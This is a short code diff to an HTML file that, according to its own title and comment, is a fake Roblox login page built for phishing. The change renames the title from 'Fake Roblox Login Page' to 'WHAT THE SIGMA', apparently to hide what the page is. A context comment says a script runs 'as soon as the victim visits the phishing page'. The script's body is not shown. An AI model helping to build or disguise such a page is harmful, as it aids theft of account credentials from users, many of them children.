--- a/index.html
+++ b/index.html
@@ -3,7 +3,7 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Fake Roblox Login Page</title>
+    <title>WHAT THE SIGMA</title>
     <script>
         // This script will run as soon as the victim visits the phishing page
 
